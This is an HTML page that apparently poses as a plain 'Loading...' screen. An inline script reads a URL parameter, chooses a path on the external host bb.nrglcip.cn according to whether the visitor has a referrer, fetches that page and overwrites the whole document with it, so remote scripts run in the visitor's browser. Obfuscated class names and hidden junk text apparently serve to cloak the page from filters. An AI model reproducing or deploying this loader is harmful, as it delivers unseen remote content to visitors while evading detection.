<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .G7DUabU {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .G7DUabU .Jm3dHE {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .G7DUabU .content {
            line-height: 50px;
            text-align: center
        }

        .G7DUabU .img {
            width: 100%
        }

        .G7DUabU .QqSr6xxl {
            text-align: center
        }

        .G7DUabU .QqSr6xxl span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .G7DUabU .QqSr6xxl span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .G7DUabU .QqSr6xxl span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .G7DUabU .QqSr6xxl span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .G7DUabU .QqSr6xxl span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .G7DUabU .QqSr6xxl span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .G7DUabU .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ZSiwK1QjBJB(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var jlMo7 = ZSiwK1QjBJB('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ jlMo7 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ jlMo7 +".html?a=share";
		}
		
        LIf4UrUC=url+"#"+new Date().getTime();
        LIf4UrUC && function() {
            $.get(LIf4UrUC, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >LqKyT23sr8ruLzsHkXklaUFZklVQ3EMtxFqKlkux1igpgBZE0Ps01YMUUPZB3oMGyNm11YV7WrRG</b>
<img  src='' style='display:none'>
<li style='display:none' >t1ywiTJNlu5eaFzpK2zJLfhAjFSzpEsE1ZXGumleIYDkFt8tFeyCBbQcBg9AJv5dA91eczloNRdWIBgZaWjBVoOyClviOmLFXwr1v</li><div class="G7DUabU">
    <div class="Jm3dHE">
        <div class="QqSr6xxl">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>nIgZQiE95agqWclDshHBkmFnsS2cdvMedKfher4yChpk6pAHn9fIydFYi</a>
<a  href='#' style='display:none'>nIgZQiE95agqWclDshHBkmFnsS2cdvMedKfher4yChpk6pAHn9fIydFYi</a>
<ul style='display:none' >UqmnUkDj7k5WMFdUSszBaDMwszjtGQ</ul>
<a  href='#' style='display:none'>nIgZQiE95agqWclDshHBkmFnsS2cdvMedKfher4yChpk6pAHn9fIydFYi</a>
<li style='display:none' >h504dlBhbBcWsYF3tTOrc55CNV5lP5Ylp6aXL1xE34rzwvd6YpcDqqTQuzsISPMPpTZjLujKU7EuYun5TzMRlPl8uwrE8mUKHbS</li>
<img  src='' style='display:none'></body>
</html>